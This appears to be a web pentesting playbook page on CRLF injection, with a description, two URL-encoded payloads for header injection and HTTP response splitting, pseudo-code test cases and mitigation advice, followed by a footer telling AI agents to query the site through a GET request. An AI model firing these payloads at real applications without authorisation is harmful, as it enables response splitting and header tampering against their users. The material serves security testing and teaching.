# CRLF Injection

#### Description

CRLF (Carriage Return Line Feed) Injection occurs when an attacker can inject CRLF characters into HTTP headers, potentially leading to HTTP response splitting, header injection, or other malicious actions.

#### Example with Scenario

**Scenario:** A web application takes user input to generate HTTP headers. An attacker can manipulate the input to inject additional headers or split the HTTP response, leading to various attacks.

#### Payloads and Test Cases

**Payloads**

1. **Header Injection:**

   ```
   %0D%0AInjected-Header: injected
   ```
2. **HTTP Response Splitting:**

   <pre data-overflow="wrap"><code>%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A&#x3C;h1>Injected Content&#x3C;/h1>
   </code></pre>

**Test Cases**

1. **Header Injection:**
   * **Payload:**

     ```
     %0D%0AInjected-Header: injected
     ```
   * **Test Case:**

     ```python
     # Send payload to the server
     sendPayloadToServer("input=%0D%0AInjected-Header: injected")
     # Verify if the application includes the injected header
     checkForInjectedHeader("Injected-Header", "injected")
     ```
2. **HTTP Response Splitting:**
   * **Payload:**

     <pre data-overflow="wrap"><code>%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A&#x3C;h1>Injected Content&#x3C;/h1>
     </code></pre>
   * **Test Case:**

     <pre class="language-python" data-overflow="wrap"><code class="lang-python"># Send payload to the server
     sendPayloadToServer("input=%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A&#x3C;h1>Injected Content&#x3C;/h1>")
     # Verify if the application splits the HTTP response
     checkForInjectedContent("&#x3C;h1>Injected Content&#x3C;/h1>")
     </code></pre>

#### Mitigation

1. **Input Validation:**
   * Validate and sanitize user input to ensure it does not contain CRLF characters.
   * Implement strict validation rules to reject malicious input.
2. **Use Libraries:**
   * Use libraries and frameworks that automatically handle header encoding and prevent injection.
   * Avoid constructing HTTP headers manually using user input.
3. **Secure Headers:**
   * Set secure HTTP headers to mitigate the impact of potential CRLF injection.
   * Use Content Security Policy (CSP) and other security headers to protect the application.
4. **Error Handling:**
   * Implement proper error handling to avoid revealing header information in error messages.
   * Return generic error messages without disclosing sensitive details.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://playbook.sidthoviti.com/web-app-pentesting/crlf-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.